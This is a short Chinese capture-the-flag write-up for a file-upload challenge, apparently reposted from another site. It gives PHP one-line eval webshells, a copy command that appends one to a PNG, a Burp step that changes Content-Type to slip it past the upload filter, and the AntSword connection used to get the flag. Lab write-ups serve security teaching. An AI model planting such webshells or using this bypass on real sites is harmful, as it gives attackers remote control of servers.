【CTF】CTFHub 技能树 文件头检查 writeup

✨PHP一句话木马

<?php @eval($_POST["pass"]);?>
<?php eval($_REQUEST["pass"]);?>

详情可浏览：Web安全-一句话木马

 

✨制做图片马

 

1)copy命令

copy 1.png/b+1.php/a pic.php

！！！不要使用powershell 请使用cmd

//powershell中copy命令应该命令参数不同 致使各类报错

 

2）文本编辑器/十六进制编辑器

用文本编辑器/十六进制编辑器打开图片在末尾添加一句话木马

而后保存为xxx.php

//通过测试后续也能够蚁剑链接 和copy命令比较只是文件末尾少了个1A（文件结束符）

知识扩展：ASCII码0x1A使文件意外结束的处理方法

 

✨Burp改包

Burp开启proxy后对文件上传submit抓包

而后修改Content-Type为image/png

！注意修改位置

//靶场环境只容许PNG、JPG、GIF格式文件上传 改包绕过

 

✨蚁剑链接

得到flag

结束。

 

✨图片马注意点

开始遇到问题蚁剑一直链接失败

后来选用了较为简单的图片制做图片马蚁剑就链接成功了

制做图片马的图片必定要简单 越简单越好

好比下面这样的

 

⭐转载请注明出处

本文做者：双份浓缩馥芮白

原文连接：http://www.javashuo.com/article/p-cogyevek-ne.html

版权全部，如需转载请注明出处。